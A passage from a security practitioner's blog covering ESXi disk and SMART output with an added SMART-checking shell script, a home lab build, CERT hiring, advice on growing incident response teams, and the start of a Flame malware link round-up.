<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ # vim-cmd vmsvc/get.guest 13 | grep -m 1 ipAddress</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ipAddress = "192.168.1.160",</span><br />
<br />
I can get smartd information from my hard drive if needed.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ # esxcli storage core device list</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Display Name: Local ATA Disk (t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Has Settable Display Name: true</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Size: 953869</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Device Type: Direct-Access </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Multipath Plugin: NMP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Devfs Path: /vmfs/devices/disks/t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Vendor: ATA </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Model: ST1000DM003-1CH1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Revision: CC44</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> SCSI Level: 5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Pseudo: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Status: on</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is RDM Capable: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Local: true</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Removable: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is SSD: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Offline: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Perennially Reserved: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Queue Full Sample Size: 0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Queue Full Threshold: 0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Thin Provisioning Status: unknown</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Attached Filters: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> VAAI Status: unknown</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Other UIDs: vml.01000000002020202020202020202020205a31443347484b46535431303030</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Local SAS Device: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Boot USB Device: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ # esxcli storage core device smart get -d t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Parameter Value Threshold Worst</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------- ----- --------- -----</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Health Status OK N/A N/A </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Media Wearout Indicator N/A N/A N/A </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Write Error Count N/A N/A N/A </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Read Error Count 115 6 99 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Power-on Hours 100 0 100 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Power Cycle Count 100 20 100 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Reallocated Sector Count 100 10 100 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Raw Read Error Rate 115 6 99 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Drive Temperature 32 0 40 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Driver Rated Max Temperature 68 45 65 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Write Sectors TOT Count 200 0 200 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Read Sectors TOT Count N/A N/A N/A </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Initial Bad Block Count 100 99 100 </span><br />
<br />
There is a lot more you can do from the ESXi command line interface, but I should emphasize again that it is stripped fairly bare and lacks many of the commands you would expect if you come from a Linux or Unix background. Even some of the utilities that are available lack options or functionality you would expect. The CLI commands will generally list their options or help text when run without arguments. You can also get plenty of <a href="http://www.vmware.com/support/developer/vcli/">CLI documentation</a> from VMware.<br />
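To act on the SMART table shown above from a script, here is an added example (not code from the original post) in POSIX sh with awk, which the ESXi shell provides. It assumes the column layout printed above and flags any attribute whose normalized Value, or worst-ever reading, has reached the vendor Threshold; one embedded sample table is copied from the post's output and a second is constructed to show a failing drive.

```shell
#!/bin/sh
# Added example, not code from the original post: check the table printed by
#   esxcli storage core device smart get -d <device>
# for SMART attributes whose normalized Value has fallen to the vendor Threshold.
# Assumes the output layout shown in the post (Parameter, Value, Threshold, Worst)
# and uses only awk, which the ESXi shell provides. On a host you would run:
#   esxcli storage core device smart get -d "$DEV" | smart_check

smart_check() {
    awk '
        # The header and the dashed separator carry no data.
        /^Parameter/ || /^-+/ { next }
        NF < 4 { next }
        {
            value = $(NF-2); thresh = $(NF-1); worst = $NF
            # Parameter names contain spaces, so the name is everything
            # before the last three columns.
            name = $1
            for (i = 2; i <= NF-3; i++) name = name " " $i
        }
        # Health Status is the drive firmware overall verdict.
        name == "Health Status" && value != "OK" {
            printf "FAIL: %s is %s\n", name, value; bad = 1; next
        }
        # Skip attributes the driver cannot read (N/A) and attributes with
        # no vendor threshold (0), such as Power-on Hours.
        value ~ /^[0-9]+$/ && thresh ~ /^[0-9]+$/ && (thresh + 0) > 0 {
            if (value + 0 <= thresh + 0) {
                printf "FAIL: %s value %s <= threshold %s\n", name, value, thresh
                bad = 1
            } else if (worst ~ /^[0-9]+$/ && worst + 0 <= thresh + 0) {
                # The live value recovered but the worst-ever reading hit the
                # threshold, which is worth a look before it happens again.
                printf "WARN: %s worst %s reached threshold %s\n", name, worst, thresh
                bad = 1
            }
        }
        END { exit (bad ? 1 : 0) }
    '
}

# Sample 1: the healthy output shown in the post above (values copied from it).
HEALTHY_SMART=$(cat <<'EOF'
Parameter                     Value  Threshold  Worst
----------------------------  -----  ---------  -----
Health Status                 OK     N/A        N/A
Media Wearout Indicator       N/A    N/A        N/A
Write Error Count             N/A    N/A        N/A
Read Error Count              115    6          99
Power-on Hours                100    0          100
Power Cycle Count             100    20         100
Reallocated Sector Count      100    10         100
Raw Read Error Rate           115    6          99
Drive Temperature             32     0          40
Driver Rated Max Temperature  68     45         65
Write Sectors TOT Count       200    0          200
Read Sectors TOT Count        N/A    N/A        N/A
Initial Bad Block Count       100    99         100
EOF
)

# Sample 2: constructed output for a drive that is running out of spare
# sectors and has overheated in the past. The non-OK health string is made up.
FAILING_SMART=$(cat <<'EOF'
Parameter                     Value  Threshold  Worst
----------------------------  -----  ---------  -----
Health Status                 FAILED  N/A       N/A
Read Error Count              110    6          99
Power-on Hours                87     0          87
Reallocated Sector Count      8      10         8
Drive Temperature             34     0          45
Driver Rated Max Temperature  66     45         40
Initial Bad Block Count       100    99         100
EOF
)

# Demonstration; the exit status makes this usable from a cron job or alert script.
printf '%s\n' "$HEALTHY_SMART" | smart_check && echo "healthy sample: no problems"
printf '%s\n' "$FAILING_SMART" | smart_check || echo "failing sample: drive needs attention"
```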
<h3>
Next Steps</h3>
<br />
I now have a number of VMs installed, including a CentOS snapshot, FreeBSD, and my Windows 7 VM. My next steps will include setting up some VLANs to have some fun with a vulnerable network and an attacker network that will include <a href="http://www.kali.org/">Kali Linux</a>. I am intimately familiar with Sguil and some of the other tools in Security Onion, but also hope to dig into Suricata and Bro more than I have in the past.<br />
<br />
I also hope that my lab will provide some interesting material for future blog posts.<br />
<br />
Nathaniel Richmond<br />
<br />
New Home Lab Configuration (2013-04-04)<br />
<br />
I received all my new equipment for my home lab a couple of days ago. After setting up the hardware in less than a day, I'm quite happy with it so far.<br />
<br />
I was lucky enough to have two 12-year-olds assist me when I assembled the computer. This was their first time assembling a computer from parts and they really enjoyed it.<br />
<br />
The first component was the Shuttle <a href="http://global.shuttle.com/products/productsSpecUS?productId=1477" target="_blank">SH67H3</a>. My friend Richard <a href="https://twitter.com/taosecurity/status/309097910392483841" target="_blank">recommended</a> the <a href="http://us.shuttle.com/barebone/Models/DS61.html" target="_blank">DS61</a>, but I had two main problems with that barebones system. First, it only has two RAM slots for a maximum of 16GB. That's not bad, but I decided I wanted to get a desktop that supported more RAM without going to server components while keeping the form factor small. I actually may have a second system on my purchase list for sometime this year, and in that case I would definitely consider the DS61.<br />
<br />
Second, I had read that the SH67H3 <a href="http://www.ryanbirk.com/the-perfect-vmware-vsphere-5-homelab" target="_blank">worked</a> as <a href="http://rsts11.wordpress.com/2012/03/13/rsts11-building-my-compact-vmware-server-at-home/" target="_blank">an ESXi whitebox</a>. Overall, I am a fan of Shuttle barebones. The SH67H3 is essentially the same chassis my coworkers and I used on our lab network at a previous job, just with a new motherboard and other improvements. I used very similar or identical parts for my Shuttle as the ones listed in the ESXi whitebox link above.<br />
<div>
<ul>
<li><a href="http://global.shuttle.com/products/productsSpecUS?productId=1477" target="_blank">Shuttle SH67H3</a> barebones</li>
<li><a href="http://ark.intel.com/products/52213" target="_blank">Intel Core i7 2600</a> @3.4GHz</li>
<li><a href="http://www.gskill.com/products.php?index=422" target="_blank">G.Skill F3-12800CL10S-8GBXL</a> x4 -- this memory is on the Shuttle compatibility list</li>
<li><a href="http://www.seagate.com/internal-hard-drives/desktop-hard-drives/desktop-hdd/" target="_blank">Seagate Barracuda 1TB SATA3 64MB Cache</a> 3.5" hard drive</li>
<li><a href="http://us.liteonit.com/us/product/dvd/category/dvdinternal" target="_blank">Lite-On iHAS524</a> SATA DVD/CD writer</li>
</ul>
</div>
<div>
When we popped the case open, it all looked pretty familiar and I explained the various pieces to the 12-year-olds. We removed the fan and heat sink array, which is a pretty nice low-noise setup. The case fan actually slides over the second heat sink so air blows over it on the way out the back of the chassis.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://image.shuttle.com/ResourceCenter/Upload/1477/1477_WebImage_WebImage_201103161412_6" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://image.shuttle.com/ResourceCenter/Upload/1477/1477_WebImage_WebImage_201103161412_6" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Don't forget to remove both the sticker from the heatsink and the plastic film that is on the CPU load plate before putting the CPU in the socket. After we inserted the Intel Core i7 2600, we applied thermal paste, reattached the passive cooling, and finally reattached the fan including plugging it back into the motherboard. We also inserted the four 8GB RAM sticks.</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhRkpQwJkjE8FdgxejhnvzVn291VYEK48L9rwqz4lENLPyVaJ3Tkqk7TpFGpafj_Jv8N-IadlvkMfhoed5N2wB82M_0jn6dfBNqyKZHCWsAvlLKconR9_Yr0NFlbQ8QPvUZ53WUKlJaHsY/s1600/IMG_0193+copy.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhRkpQwJkjE8FdgxejhnvzVn291VYEK48L9rwqz4lENLPyVaJ3Tkqk7TpFGpafj_Jv8N-IadlvkMfhoed5N2wB82M_0jn6dfBNqyKZHCWsAvlLKconR9_Yr0NFlbQ8QPvUZ53WUKlJaHsY/s320/IMG_0193+copy.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Shuttle SH67H3 motherboard with CPU and RAM installed</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ISa3GFP83IOg8hBlOgdNw1UG0pUifD3gMGSm7nodUWzZBUPrFkTOju-hQybBnJucoXGjzTnwO8eWcIFxVm057rDgPAaR6sUStK5EgP2fFvm00ZQ_1bBNgCN7BmrsZL3h2E53RhBvcz96/s1600/IMG_0192+copy.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ISa3GFP83IOg8hBlOgdNw1UG0pUifD3gMGSm7nodUWzZBUPrFkTOju-hQybBnJucoXGjzTnwO8eWcIFxVm057rDgPAaR6sUStK5EgP2fFvm00ZQ_1bBNgCN7BmrsZL3h2E53RhBvcz96/s320/IMG_0192+copy.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The fan slides over the heat sink at the rear of the chassis on the left</td></tr>
</tbody></table>
Next, we put the DVD/CD drive and hard drive into the tray, attached the tray to the chassis, and connected the SATA and power cables. I also added a dual Intel PRO/1000 PT NIC to give a total of three physical network interfaces. We finally tested and everything appeared to be working.<br />
<div>
<h3>
New Network Architecture</h3>
<div>
<br />
Having gone to all this trouble for a computer that is relatively powerful compared to my three old Pentium III servers, I decided to take the opportunity to make a couple of other network changes. I used to run my network sensor <a href="http://eatingsecurity.blogspot.com/2008/01/idsips-placement-on-home-network.html" target="_blank">inline</a>, but along with the new computer I purchased a <a href="http://www.netgear.com/business/products/switches/smart-switches/smart-switches/GS108T-200.aspx" target="_blank">Netgear GS108T-200</a> smart switch. This switch has an abundance of features, including VLANs and port mirroring. Along with the new switch, all I needed was an extra WAP to reconfigure my home network as shown below.</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbzkkC5CiwvbEigy4C0md_SP1rhiTwvUYPLHy8Df9-QJ8OhrV05xYkOANeTozxuBQUgEAmft2EOoXJdmARoKSJn5BU3DXcA1zjVYb2Qc_SSpNEapZoqFYi2oPT30L46T1sKNdi6ltVaQOR/s1600/Lab+network.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="392" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbzkkC5CiwvbEigy4C0md_SP1rhiTwvUYPLHy8Df9-QJ8OhrV05xYkOANeTozxuBQUgEAmft2EOoXJdmARoKSJn5BU3DXcA1zjVYb2Qc_SSpNEapZoqFYi2oPT30L46T1sKNdi6ltVaQOR/s640/Lab+network.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The router/firewall also works as a WAP, but to see most client traffic<br />
I disabled it and connected an access point behind the mirroring switch</td></tr>
</tbody></table>
<div>
With this configuration, the switch will mirror traffic to a dedicated network interface on my network sensor. Only traffic that doesn't make it to the switch will not be seen on the mirror port. I can also configure VLANs on the switch if I want to segment the network based on functions like management interfaces and WiFi clients.<br />
<br />
I plan to write more about my lab setup as I continue to redevelop it. The first thing I did after testing the new box was install ESXi and create a network sensor VM using <a href="http://securityonion.blogspot.com/" target="_blank">Security Onion</a>. I may have a post about it soon.</div>
</div>
Nathaniel Richmond<br />
<br />
CERT is hiring (2013-03-29)<br />
<br />
The company I work for is hiring. For those that don't know, <a href="http://www.cert.org/" target="_blank">CERT</a> is part of the <a href="http://www.sei.cmu.edu/" target="_blank">Software Engineering Institute</a> at Carnegie Mellon University. CERT was created in 1988 as part of the response to the Morris worm. You can find out more on CERT's "<a href="http://www.cert.org/meet_cert/" target="_blank">About Us</a>" page.<br />
<br />
If you are interested, please read more about our <a href="http://www.cert.org/jobs/hiring_process.html" target="_blank">hiring process</a> and browse some of the <a href="http://www.cert.org/nav/jobs.html" target="_blank">available positions</a>. The positions are primarily in Pittsburgh with a few openings in Arlington, VA. The open positions cover network security analysis, security architecture, malware analysis, software development, vulnerability analysis, and more.<br />
<br />
I consider our hiring process fairly grueling but also stimulating. It gives the prospective employee and prospective coworkers a good chance to really learn if the relationship will work. It is an opportunity not just for the candidate to get interviewed, but also for the candidate to interview those that already work at CERT.<br />
<br />
One of the reasons we have so many vacant positions is because we try to maintain high standards when considering candidates. Most of our positions require a fair amount of experience and expertise. My colleagues are smart, diligent, and largely enthusiastic about their chosen professions. Don't get me wrong -- we still have bad days when we are less enthusiastic or unhappy about the state of information security, but this is a pretty cool place to work. We do a wide variety of both research and more operationally focused work, tackling a lot of big problems. We also get a fair amount of freedom to find interesting and challenging areas of work.<br />
<br />
If I know you or know of your work, please contact me about using my name as a referral. A referral from a current CERT employee can be helpful when applying. The best way to contact me regarding a referral or to ask other questions is via email or LinkedIn. You can also post questions more publicly here on my blog if it seems appropriate. In the interest of disclosure, I have an interest in recruiting people that I will want to work with but also could potentially get a referral bonus if you list me when you apply.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-68422727899006562022013-03-11T16:14:00.001-04:002013-03-11T16:14:57.676-04:00Building an IR Team: GrowthThis is a long overdue continuation of my posts regarding Building an Incident Response Team. I had a very rough outline of this post going all the way back to 2009! The good response I got on some of my previous posts on building IR teams made me come back and work on finishing the posts I had planned when I first started the series.<br />
<br />
Previous posts:<br />
<ul>
<li><a href="http://eatingsecurity.blogspot.com/2009/07/building-ir-team-documentation.html">Building an IR Team: Documentation</a> </li>
<li><a href="http://eatingsecurity.blogspot.com/2009/06/building-ir-team-organization.html">Building an IR Team: Organization</a> </li>
<li><a href="http://eatingsecurity.blogspot.com/2009/04/building-ir-team-people.html">Building an IR Team: People</a></li>
</ul>
I believe one of the hardest things to deal with when building a successful IR team is growth. If you build an IR team that is successful and gets management buy-in as a result, there is a good chance that responsibilities, the amount of work, the number of incidents detected, and the size of the team will all grow. This will invariably cause growing pains, setbacks, and reevaluation of procedures.<br />
<br />
I honestly could go on and on about dealing with the growth of an IR team. There are so many things to consider that it is daunting to plan for growth ahead of time instead of just dealing with the hurdles as they come. However, if you have a team that is growing it really helps to take a step back and plan for both immediate and long-term growth. It is so important that a fair amount of this post will reiterate what I have explicitly or implicitly said in some of my previous "Building an IR Team" posts.<br />
<br />
There are a number of questions to keep in mind when an IR team grows. What are the additional duties causing the addition of positions? Are the additional positions adequate to cover the additional duties and responsibilities? If not, how can expectations be managed so superiors understand what is actually feasible? Are the duties just a higher volume of what the team already is responsible for, or are there new areas that will require different types of team members and different types of training? What works well now but may be problematic with a larger team? Do we need to restructure? How do we maintain the success that led to the IR team growth? The last question is one of the most fundamental.<br />
<br />
<h3>
Relationships</h3>
<br />
At one point I worked on a team that, over the course of a few years, increased the number of personnel fourfold. This completely changed the dynamics of the team, from the lead all the way down to the most junior analyst. The more people you add, the more complex the relationships become. This applies not only to relationships within the team, but also relationships with other parts of your organization and management.<br />
<br />
With such growth, it became a lot more important to clearly define roles and responsibilities, the command structure, and get management support of decisions.<br />
<ul>
<li>Command structure: As the team grows, other groups in the company are less likely to know each person on the team. This means in a lot of cases it is helpful to have a few key people known to those other groups. These key people don't have to always be the ones to communicate with a specific group, but can be used as a fallback if the other group's first instinct is to be more adversarial with those people they don't know.</li>
<li>Intra-team relationships: The more people you have, the more you have to keep an eye on the working relationships between members. When a team numbers in the single digits, it is almost natural to know all the ins and outs of those relationships, for example who complements each other and who can be a good mentor to more junior analysts. It takes more conscious effort to track this as the number of people increases. It also requires more deliberately setting expectations for what you expect of each team member.</li>
<li>Management support and inter-team relationships: As a team gets bigger, its profile is raised throughout the company. This can make dealing with other groups easier, more difficult, or most likely a little bit of both. As we all know, IR teams sometimes need to make decisions or do things that are not popular and people outside the team view as irritating to say the least. It is very important to have management support when you invariably have conflicts with those outside the IR team. It's also important to have a manager that knows when to tell you that you're being unreasonable and the outside groups have a reasonable concern or complaint.</li>
</ul>
This is by no means a complete list of things to consider. The bottom line is that a larger team makes both intra- and inter-team relationships more complex.
<br />
<br />
<h3>
Other Growing Pains</h3>
<br />
The simplest example I have from the past regarding growing pains was when I was on a team that was not gaining new areas of responsibility but was switching to coverage 24 hours a day, seven days a week. As I covered in another blog post, it is important to come up with the proper <a href="http://eatingsecurity.blogspot.com/2009/06/building-ir-team-organization.html" target="_blank">organization</a> and make sure every shift is productive. Increasing the number of hours of coverage also obviously means hiring new analysts, plus the possibility of shifting current analysts to drastically different schedules.<br />
<br />
Restructuring can often cause conflicts beyond those involving work schedules. On a small team, most people gravitate to a niche and can often be allowed to work in it as long as they can also handle the more generalized response duties. In a larger team, it's much harder to let members naturally gravitate towards certain areas while maintaining the ability to get all the work done. It certainly is nice to keep everyone happy and specializing in the areas they are most interested in, but it's not always realistic. One way to help with this is to make sure you follow the advice for redundancy in the "<a href="http://eatingsecurity.blogspot.com/2009/06/building-ir-team-organization.html" target="_blank">Organization</a>" post, plus allow members to rotate through different areas of specialty. This means they won't be stuck in one particular area, in addition to providing redundancy of skills.<br />
<br />
Another issue is making sure you formalize reporting to some degree. In a team of a few people, it's readily apparent what each person is doing. When you have a score of people, you need to get both formal and informal reporting from shift leads, team leads, mentors, and even individual analysts to properly understand who is doing what, workloads, what is working well, and what is not working. Regardless, the structure of a larger IR team probably needs to be more formal. Notice the "probably." I think it is safe to say there may be exceptions to all these points! The key is to find the proper balance that enables useful reporting while avoiding unneeded bureaucracy.<br />
<br />
Hiring can also create growing pains. I must stress that you should do everything possible to maintain standards when hiring. That said, a bigger team can mean more room and opportunity for less experienced analysts. One weak link among five people is a much bigger deal than one weak link among 30, so a larger team can allow you to take a chance or two when hiring. I've always been an advocate of getting smart people that can learn and are legitimately interested in the field over those who have experience but less potential for growth, and a larger team can sometimes make this easier to justify.<br />
<br />
<h3>
Evaluation of Procedures and Operations</h3>
<br />
This advice really applies to all IR teams, but becomes more important with growth. Incident response procedures that work well in a small team may not work as well with a larger group. Even if your team has not grown, you may want to regularly reevaluate IR workflow, reporting, or just about any existing procedures and standards of operations. Sometimes it may mean more clearly codifying what were once informal standards, while other times it may mean completely rethinking how you operate because you have several tiers of analysts. Having good metrics so you can try to make reevaluation more objective and less subjective also helps. Unfortunately, metrics is a huge topic that I can't address in this post, but there are many sites, papers, books, and more to help anyone interested in the topic.<br />
<br />
Standards for working with the field may also need to change. If you are in an enterprise where the IR team often is reaching out to "boots on the ground" like local system administrators or IT staff, there may need to be changes in areas of responsibility when the IR team is larger. I partially covered this when mentioning inter-team relationships. Even if your IR team is comfortable contacting those in the field directly, those managing the people in the field may want a more formal command structure so they can track requests and other communications from the IR team. Contacts in the field may also want their roles and responsibilities more formally or clearly defined. This is easier to work through when the IR team only has a few people, but once there are dozens it can cause problems if those in the field don't know upfront what the IR team expects and what qualifies as an unusual request from the IR team.<br />
<br />
<h3>
Training</h3>
<br />
A larger IR team means the company is spending a lot more money on the team and security in general. It also means you may have enough team members to form a class-sized group. Whether you use in-house training, outsource, or a combination, a larger team means you will need to think about more formal training where a large group is in a classroom environment. This doesn't mean one-on-one or one-on-few mentoring and training should go away, but you will need to adapt to training larger groups. You also should consider setting aside money specifically for training if that was not done previously.
<br />
<br />
<h3>
Be Flexible</h3>
<br />
Note that this is all based on my experiences in the past 10 or more years, but it is just the tip of the iceberg. Different teams may have different issues to consider when growing. Depending on the specific IR team, none of what I wrote may apply directly. I think there are two overriding concerns when an IR team grows. One is to be flexible as the team grows so your organization can really see what works and what does not. Two is to plan for the growth instead of just letting it happen haphazardly. Some teams do quite well with very little change after they've grown, while some may need drastic changes just because of adding a few people or analyst turnover.<br />
<br />
<h3>
Other Resources</h3>
<br />
There are some resources available to help deal with creating IR teams, and much of what applies at creation of a team can apply to the growth of a team. When a team goes from a few people to 20-30 people, you essentially are destroying the old team and creating a new one. Most of the questions considered when creating an IR team can be asked once again and reevaluated as the team grows.
<br />
<ul>
<li><a href="http://www.cert.org/csirts/Creating-A-CSIRT.html" target="_blank">Creating a Computer Security Incident Response Team: A Process to Getting Started</a> from CERT.</li>
<li><a href="http://www.cert.org/archive/pdf/csirt-handbook.pdf" target="_blank">Handbook for Computer Security Incident Response Teams</a> (PDF) from CERT, which is not recent but still has a lot of useful information.</li>
<li><a href="http://www.unisys.com/unisys/inc/countrysites/pdf/4_HPEnterpriseSecurity_Whitepaper_SuccessfulSOC.pdf" target="_blank">Building a Successful Security Operation Center</a> from HP.</li>
<li><a href="http://www.ietf.org/rfc/rfc2350.txt" target="_blank">RFC 2350: Expectations for Computer Security Incident Response</a> from 1998.</li>
</ul>
Richard Bejtlich has posted on <a href="http://taosecurity.blogspot.com/" target="_blank">his blog</a> about many aspects of building and maintaining SOCs, and also mentioned that he will have a chapter in his <a href="http://nostarch.com/nsm" target="_blank">new book</a> titled "Network Security Monitoring Operations," focused on sharing "the author’s experience building and leading a global Computer Incident Response Team (CIRT), such that readers can apply those lessons to their own operations." I presume anyone regularly reading my blog is already reading Taosecurity, and also anticipate that his new book will be quite useful.<br />
<br />
<div>
I hope to have at least one more post in my "Building an IR Team" series. I may also have additional material, or collate and improve all my existing posts if I feel it is worthwhile.<br />
</div>
Nathaniel Richmond<br />
<br />
Reflections on Over Five Years of Blogging (2013-03-01)<br />
<br />
My first post to this blog was in September, 2007. Professionally speaking, I have gone through major changes since then. I've changed employer, though amazingly enough in this line of work that happened only once during that time. I have also learned a lot and my duties have changed quite a bit.<br />
<br />
Though I try to stay plugged in to incident response, NSM, and all those other operational bits I love, I am definitely a step back from directly responding to incidents compared to a lot of my previous experience. Another big change for me is that I no longer run a bunch of NSM sensors, though I still do that type of administration on my home network. On the other hand, one of the wonderful things about my current employer is that they allow us a lot of freedom to identify problems or challenges, then take them on without trying to pigeonhole us. I look forward to 2013 as a year in which I will continue being challenged by taking on some new projects of interest to me.<br />
<br />
I've gotten a number of links and traffic bursts on some of my past blog posts, which is flattering. I don't particularly feel like a unique snowflake that should get a ton of web traffic and don't usually get a ton of traffic, but occasionally I will really hit the nail on the head with a technical post and get a lot of traffic and links from other bloggers. Unsurprisingly, many of my top posts are in the system administration category since the more security-focused posts probably have a narrower target audience.<br />
<br />
I attended <a href="http://www.cert.org/flocon/" target="_blank">FloCon</a> 2013 in January, which made me reflect on a couple things. First, I am going to try and blog a little more often this year. It was very flattering to talk to people at the conference and have them say they have read my blog or to <a href="https://twitter.com/eatingsecurity/status/288379250908749825" target="_blank">find they were using content I had contributed to NSMWiki</a>. When I started this blog, my two main goals were to provide references for myself and to make those references available to others in case they also found them useful. It is good to know that my blog and other public contributions have been useful to others. I would not be where I am without similar help from others and I think that sharing of information, advice, experience, and debate is a great thing about much of the security community.<br />
<br />
The second thing it drove home is that I need to end the semi-anonymous nature of this blog. At FloCon I found that I had coworkers following me on Twitter without even realizing it was me that they were following!<br />
<br />
My previous employer knew about my blog and did not give me any grief whatsoever, but at the same time they were somewhat nervous about it. My current employer embraces public engagement to a much larger degree. Plenty of people already knew my name prior to this and Richard Bejtlich even linked to my blog using my name at least once, but generally I did not promote myself as the author. It is time to change that.<br />
<br />
CERT's FloCon 2013 CFP, posted 2012-06-15<br />
<br />
<a href="http://www.cert.org/flocon/index.html#cfp" target="_blank">CERT's FloCon 2013 CFP</a> is posted.<br />
<br />
Albuquerque, New Mexico, on January 7–10, 2013.<br />
<br />
I plan to attend.<br />
<br />
Flame Round-up, posted 2012-06-08<br />
<br />
Updated June 13 with a few more links.<br />
<br />
I decided to write a short post with a Flame timeline, links to the related information, and a brief summary of the interesting information available at each link. I might update this post if I get comments with additional interesting links or if there are significant new developments. When possible, I'm trying to catalog technical discussion rather than news aimed at a general non-technical audience.<br />
<br />
Note that many of the dates, on blog posts in particular, will reflect the last time the post was changed rather than initial posting date. This can be a problem when relying on sites that do not show both a publication and modification date for web publications. I will note when I know of discrepancies in date.<br />
<br />
2012 May 28:<br />
<br />
<a href="http://www.kaspersky.com/about/news/virus/2012/Kaspersky_Lab_and_ITU_Research_Reveals_New_Advanced_Cyber_Threat" target="_blank">Kaspersky Lab and ITU Research Reveals New Advanced Cyber Threat</a>: Kaspersky Lab posts information about new malware dubbed Flame. They were investigating incidents related to something known as Wiper on behalf of the <a href="http://www.itu.int/" target="_blank">ITU</a> and discovered Flame in the process. Kaspersky calls Flame a "super-cyberweapon" and says the primary purpose is cyber espionage. The end of the article includes a link to <a href="http://www.securelist.com/en/blog/208193522/The_Flame_Questions_and_Answers" target="_blank">The Flame: Questions and Answers</a>, a technical FAQ. Judging by the CrySyS report (below), Wiper and Flame could actually be one and the same.<br />
<br />
<a href="http://www.certcc.ir/index.php?name=news&file=article&sid=1894" target="_blank">Identification of New Targeted Attack</a>: Dated the same day as the Kaspersky Lab post, the Iranian CERTCC (MAHER) posts information gleaned from an investigation into Flame. They include bullet points listing some of Flame's behaviors and capabilities.<br />
<blockquote class="tr_bq">
<ul>
<li>Distribution via removable media</li>
<li>Distribution through local networks </li>
